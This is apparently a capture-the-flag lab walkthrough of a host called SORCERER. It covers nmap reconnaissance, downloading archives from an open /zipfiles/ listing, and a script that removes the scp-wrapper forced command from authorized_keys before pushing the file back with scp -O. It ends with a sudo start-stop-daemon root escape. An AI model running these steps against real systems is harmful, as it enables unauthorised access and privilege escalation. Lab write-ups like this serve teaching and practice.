1. Reconnaissance
sudo ./nmapAutomator.sh 192.168.185.100 all
Running all scans on 192.168.185.100
Host is likely running Unknown OS!
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 812a4224b590a1ce9bace74e1d6db4c6 (RSA)
| 256 d0732a05527f89093776e356c8ab2099 (ECDSA)
|_ 256 3a2dde33b01ef2350f8dc8d78ff9e00e (ED25519)
80/tcp open http nginx
|_http-title: Site doesn’t have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS Detection modified to: Linux
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
7742/tcp open msss
33603/tcp open unknown
41637/tcp open unknown
42193/tcp open unknown
59253/tcp open unknown
Making a script scan on extra ports: 7742, 33603, 41637, 42193, 59253
PORT STATE SERVICE VERSION
7742/tcp open http nginx
|_http-title: SORCERER
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
111/udp open rpcbind
2049/udp open nfs
Making a script scan on UDP ports: 111, 2049
PORT STATE SERVICE VERSION
111/udp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/udp open nfs_acl 3 (RPC #100227)
---------------------Starting Vulns Scan-----------------------
Running CVE scan on all ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
80/tcp open http nginx
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7742/tcp open http nginx
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Running Vuln scan on all ports
This may take a while, depending on the number of detected services..
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2019-16905 4.4 https://vulners.com/cve/CVE-2019-16905
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
80/tcp open http nginx
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 41637/tcp mountd
| 100005 1,2,3 52180/udp mountd
| 100021 1,3,4 42193/tcp nlockmgr
| 100021 1,3,4 58389/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7742/tcp open http nginx
| http-enum:
| /default/: Potentially interesting folder
|_ /zipfiles/: Potentially interesting folder w/ directory listing
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
33603/tcp open mountd 1-3 (RPC #100005)
41637/tcp open mountd 1-3 (RPC #100005)
42193/tcp open nlockmgr 1-4 (RPC #100021)
59253/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 gave nothing of interest (an untitled nginx page), so attention moved to port 7742, where nginx serves a site titled SORCERER and http-enum found /default/ and /zipfiles/, the latter with directory listing enabled. Two caveats on the vuln scan output before moving on: the http-vuln-cve2011-3192 "VULNERABLE" results on both web ports are false positives, because CVE-2011-3192 is an Apache byterange-filter bug while both ports identify as nginx; the NSE script infers the finding from how the server answers an overlapping Range request, not from the server software. Likewise the vulners entries against OpenSSH 7.9p1 are version-string matches, and the highest-scoring ones (CVE-2019-6111, CVE-2019-6109, CVE-2019-6110, CVE-2018-20685) are scp client-side issues that give no access to this host.

Without any credentials at this point, the next step was content discovery against the SORCERER site on port 7742:
feroxbuster --url "http://192.168.185.100:7742"

The /zipfiles/ directory has listing enabled; opening each file URL and downloading the zip archives gives material to inspect offline.
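The retrieval step above, as an added example that is not code from the original write-up: a small POSIX shell helper that parses an nginx autoindex page such as /zipfiles/, drops the parent and sub-directory links, fetches each remaining file, and then looks through the unpacked archives for SSH material. The listing HTML embedded below is constructed for the example; the archive names in it, the ./loot directory and the search patterns in inspect_archives are assumptions, not the target's real contents.

```shell
#!/bin/sh
# Added example (not the write-up's own code): enumerate and download the
# files behind an nginx directory listing, then look for SSH material in
# the extracted archives. Runs offline against SAMPLE_LISTING below;
# download_listing and inspect_archives need the real target.

# Read autoindex HTML on stdin and print the file entries it links to.
# The parent link ("../") and sub-directories end in "/" and are dropped.
listing_files() {
  grep -o 'href="[^"]*"' |
    sed -e 's/^href="//' -e 's/"$//' |
    awk '!/\/$/'
}

# Fetch every listed file from $1 (the listing URL) into directory $2.
# Defined but not called here because it needs network access. nginx
# autoindex writes relative hrefs, which is what this assumes.
download_listing() {
  url="${1%/}/"
  dest="${2:-./loot}"
  mkdir -p "$dest" || return 1
  curl -s "$url" | listing_files | while IFS= read -r f; do
    echo "[*] $url$f"
    curl -s -o "$dest/$(basename "$f")" "$url$f"
  done
}

# Unpack each downloaded zip and list anything that looks like SSH
# material: an authorized_keys file, private keys, a .ssh directory or a
# wrapper script. The patterns are a first-look heuristic, not a catalogue.
inspect_archives() {
  dest="${1:-./loot}"
  for z in "$dest"/*.zip; do
    [ -f "$z" ] || continue
    unzip -oq "$z" -d "$dest/extracted" || echo "[!] failed to unpack $z"
  done
  find "$dest/extracted" \( -name authorized_keys -o -name 'id_*' \
       -o -path '*/.ssh/*' -o -name '*wrapper*' \) 2>/dev/null
}

# Constructed stand-in for the /zipfiles/ autoindex page (not the real one).
SAMPLE_LISTING='<html><head><title>Index of /zipfiles/</title></head>
<body><h1>Index of /zipfiles/</h1><hr><pre><a href="../">../</a>
<a href="alice.zip">alice.zip</a>      20-Jan-2020 10:00    2048
<a href="bob.zip">bob.zip</a>          20-Jan-2020 10:01    4096
<a href="old/">old/</a>                20-Jan-2020 10:02       -
</pre><hr></body></html>'

printf '%s\n' "$SAMPLE_LISTING" | listing_files
```

Against the live target the sequence is download_listing http://192.168.185.100:7742/zipfiles/ ./loot followed by inspect_archives ./loot; the find output is what points at the wrapper and key material discussed next.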
Inspecting the downloaded material shows that max's access is routed through an scp wrapper: the authorized_keys entry carries an option field that runs the scp_wrapper script for every session, so the key can copy files but never reaches a shell. Rather than work within that restriction, I edited the authorized_keys file, removed every part of the option field that called the script, and left the bare key entry, then pushed the edited file back over the same scp channel that the wrapper does allow.

2. Foothold
sudo scp -O authorized_keys max@192.168.245.100:/home/max/.ssh/authorized_keys

The -O flag is not optional with a current client: scp from OpenSSH 9.0 onward defaults to the SFTP protocol, which invokes the remote sftp subsystem rather than a remote scp command and is refused by a wrapper that only passes scp through. Once the forced command is gone, a plain ssh login as max with the same key works. Note that the target address used here is 192.168.245.100, not the 192.168.185.100 scanned above; the commands are reproduced as recorded.
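The edit described above, as an added example that is not code from the original write-up: a POSIX awk filter that separates the option field of each authorized_keys entry (where a command="..." forced command lives) from the bare key, so the forced command can be reviewed and then dropped before the file is pushed back with scp -O. The sample key file, the wrapper path /usr/local/bin/scp_wrapper.sh and the private-key filename id_rsa are constructed for the example; the remote path /home/max/.ssh/authorized_keys is the one used in the write-up.

```shell
#!/bin/sh
# Added example (not the write-up's own code). OpenSSH authorized_keys lines
# have the form: [options] keytype base64-key [comment]. A forced command
# such as command="/usr/local/bin/scp_wrapper.sh" (path constructed here)
# lives in the options field; removing that field leaves an unrestricted key.

# Read authorized_keys lines on stdin. Mode "keys" (default) prints each
# entry without its options; mode "options" prints only the options field
# (an empty line for an entry that had none). Comments and blank lines pass
# through in "keys" mode. The key-type token is located by its name and by
# the base64 blob that must follow it, so a quoted command containing
# spaces or commas does not confuse the split.
authorized_keys_split() {
  awk -v mode="${1:-keys}" '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { if (mode == "keys") print; next }
    {
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)$/ &&
            $(i+1) ~ /^[A-Za-z0-9+\/]+=*$/) {
          if (mode == "keys") { lo = i; hi = NF } else { lo = 1; hi = i - 1 }
          out = ""
          for (j = lo; j <= hi; j++) out = out (j > lo ? " " : "") $j
          print out
          next
        }
      }
      print "unrecognised authorized_keys line: " $0 > "/dev/stderr"
    }'
}

# Constructed sample: one wrapped key, one unrestricted key, one comment.
SAMPLE_AUTHORIZED_KEYS='# keys for max
command="/usr/local/bin/scp_wrapper.sh",no-pty,no-agent-forwarding ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDexample max@sorcerer
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIexample backup@sorcerer'

echo "== forced commands and other options present =="
printf '%s\n' "$SAMPLE_AUTHORIZED_KEYS" | authorized_keys_split options
echo "== file to upload =="
printf '%s\n' "$SAMPLE_AUTHORIZED_KEYS" | authorized_keys_split keys

# Against the target (not run here): strip the options, then push the
# result over the legacy scp protocol so the wrapper still accepts the
# transfer, and log in with the now-unrestricted key.
#   authorized_keys_split keys < authorized_keys > authorized_keys.new
#   scp -O -i id_rsa authorized_keys.new max@192.168.245.100:/home/max/.ssh/authorized_keys
#   ssh -i id_rsa max@192.168.245.100
```

Review the "options" output before uploading: besides command=, OpenSSH honours restrict, no-pty, from= and similar options there, and a from= restriction would block the login from the attacking host even with the forced command removed.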
3. Privilege Escalation
Once logged in as max, I uploaded LinEnum to the host and ran it to start the privilege-escalation enumeration. Its sudo check showed that /usr/sbin/start-stop-daemon can be run through sudo, and GTFOBins documents that binary as a sudo escape: -S starts a process, -x names the executable to run, and -n gives a process name to match ($RANDOM makes sure no existing process matches, so a new one is started). Because sudo runs start-stop-daemon as root, the executable it starts, here /bin/sh, runs as root too. One invocation gives a full root shell:

sudo /usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh

Confirm with id in the new shell; it should report uid=0(root).
